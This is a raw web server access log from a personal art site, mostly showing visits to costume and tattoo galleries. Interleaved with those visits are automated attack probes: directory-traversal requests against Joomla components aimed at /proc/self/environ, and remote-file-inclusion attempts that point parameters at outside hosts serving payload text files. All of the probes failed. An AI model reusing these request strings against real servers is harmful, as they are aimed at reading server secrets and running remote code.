71.228.179.46 - - [31/May/2010:20:32:53 -0500] "GET /costume/026_JPG%20copy.jpg HTTP/1.1" 200 46929 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:53 -0500] "GET /costume/027_JPG%20copy.jpg HTTP/1.1" 200 46009 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:53 -0500] "GET /costume/028_JPG%20copy.jpg HTTP/1.1" 200 51488 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:53 -0500] "GET /costume/029_JPG%20copy.jpg HTTP/1.1" 200 47959 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:53 -0500] "GET /costume/030_JPG%20copy.jpg HTTP/1.1" 200 45745 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:54 -0500] "GET /costume/031_JPG%20copy.jpg HTTP/1.1" 200 44271 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:54 -0500] "GET /costume/032_JPG%20copy.jpg HTTP/1.1" 200 46966 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:54 -0500] "GET /costume/033_JPG%20copy.jpg HTTP/1.1" 200 46394 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:54 -0500] "GET /costume/034_JPG%20copy.jpg HTTP/1.1" 200 43973 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:54 -0500] "GET /costume/035_JPG%20copy.jpg HTTP/1.1" 200 55068 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:54 -0500] "GET /costume/036_JPG%20copy.jpg HTTP/1.1" 200 44291 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:32:54 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
207.46.204.185 - - [31/May/2010:20:32:56 -0500] "GET /logs/access_log.1200873600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.55.146.140 - - [31/May/2010:20:33:09 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.55.146.140 - - [31/May/2010:20:33:09 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
194.54.89.10 - - [31/May/2010:20:33:17 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
194.54.89.10 - - [31/May/2010:20:33:17 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.1" 200 46400 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.1" 200 43788 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.1" 200 46731 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.1" 200 46480 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.1" 200 49303 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.1" 200 47808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.1" 200 45534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.1" 200 46286 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.1" 200 50534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:04 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.1" 200 46201 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:07 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.1" 200 46590 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/049_JPG%20copy.jpg HTTP/1.1" 200 46261 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/050_JPG%20copy.jpg HTTP/1.1" 200 41544 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/052_JPG%20copy.jpg HTTP/1.1" 200 45569 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/054_JPG%20copy.jpg HTTP/1.1" 200 42090 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/055_JPG%20copy.jpg HTTP/1.1" 200 47426 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/051_JPG%20copy.jpg HTTP/1.1" 200 46644 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/053_JPG%20copy.jpg HTTP/1.1" 200 47421 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/056_JPG%20copy.jpg HTTP/1.1" 200 45237 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/057_JPG%20copy.jpg HTTP/1.1" 200 45023 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:38 -0500] "GET /costume/058_JPG%20copy.jpg HTTP/1.1" 200 47636 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:39 -0500] "GET /costume/059_JPG%20copy.jpg HTTP/1.1" 200 43881 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:39 -0500] "GET /costume/060_JPG%20copy.jpg HTTP/1.1" 200 44423 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
71.228.179.46 - - [31/May/2010:20:34:39 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.55 Safari/533.4"
119.63.193.56 - - [31/May/2010:20:36:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
114.108.177.125 - - [31/May/2010:20:36:52 -0500] "GET /logs/index.php?option=com_wisroyq&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:20:36:52 -0500] "GET /index.php?option=com_wisroyq&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:20:36:52 -0500] "GET /logs/access_log.1274572800/index.php?option=com_wisroyq&controller=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
76.73.80.242 - - [31/May/2010:20:37:43 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:20:37:43 -0500] "GET /logs/index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:20:37:44 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
76.73.80.242 - - [31/May/2010:20:37:44 -0500] "GET /index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.68.133 - - [31/May/2010:20:37:49 -0500] "GET //index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.142.68.133 - - [31/May/2010:20:37:49 -0500] "GET //index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
114.24.74.240 - - [31/May/2010:20:39:06 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
114.24.74.240 - - [31/May/2010:20:39:12 -0500] "GET /logs/access_log.1242950400 HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
174.142.68.133 - - [31/May/2010:20:42:08 -0500] "GET /logs/access_log.1238803200//index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
174.142.68.133 - - [31/May/2010:20:42:08 -0500] "GET /logs/access_log.1238803200//index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
174.142.68.133 - - [31/May/2010:20:42:08 -0500] "GET //index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.142.68.133 - - [31/May/2010:20:42:08 -0500] "GET //index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
174.142.68.133 - - [31/May/2010:20:42:08 -0500] "GET /logs//index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
174.142.68.133 - - [31/May/2010:20:42:09 -0500] "GET /logs//index2.php?option=com_mgmedia2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
207.46.194.143 - - [31/May/2010:20:42:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.143 - - [31/May/2010:20:42:18 -0500] "GET /artwork/tartmaster-side2d.jpg HTTP/1.1" 200 4141 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.143 - - [31/May/2010:20:42:18 -0500] "GET /artwork/ HTTP/1.1" 200 11078 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.195.242 - - [31/May/2010:20:42:25 -0500] "GET /logs/access_log.1242345600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.229.185 - - [31/May/2010:20:46:55 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:20:46:56 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
207.46.204.230 - - [31/May/2010:20:49:25 -0500] "GET /logs/access_log.1155859200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.65.59 - - [31/May/2010:20:52:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.59 - - [31/May/2010:20:52:07 -0500] "GET /logs/access_log.1272153600 HTTP/1.1" 200 577488 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.61.185.200 - - [31/May/2010:20:53:59 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
200.61.185.200 - - [31/May/2010:20:53:59 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
83.170.107.145 - - [31/May/2010:20:58:25 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
83.170.107.145 - - [31/May/2010:20:58:25 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
64.79.194.247 - - [31/May/2010:21:00:14 -0500] "GET /logs//skin/board.php?dir=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
64.79.194.247 - - [31/May/2010:21:00:15 -0500] "GET //skin/board.php?dir=http://h1.ripway.com/bezad/idx? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.31.30.17 - - [31/May/2010:21:02:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:15 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:20 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/set1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
66.31.30.17 - - [31/May/2010:21:02:30 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Opera/9.80 (Windows NT 5.1; U; en) Presto/2.5.24 Version/10.53"
124.217.229.185 - - [31/May/2010:21:03:48 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
124.217.229.185 - - [31/May/2010:21:03:49 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.250.255.243 - - [31/May/2010:21:03:57 -0500] "GET /logs/access_log.1219622400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
122.112.32.51 - - [31/May/2010:21:05:20 -0500] "GET /logs/access_log.1262649600//codebb/lang_select?phpbb_root_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:21:05:20 -0500] "GET //codebb/lang_select?phpbb_root_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
122.112.32.51 - - [31/May/2010:21:05:20 -0500] "GET /logs//codebb/lang_select?phpbb_root_path=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:11 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:11 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:11 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:12 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:12 -0500] "GET /logs/access_log.1271548800//admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
74.55.135.18 - - [31/May/2010:21:07:13 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
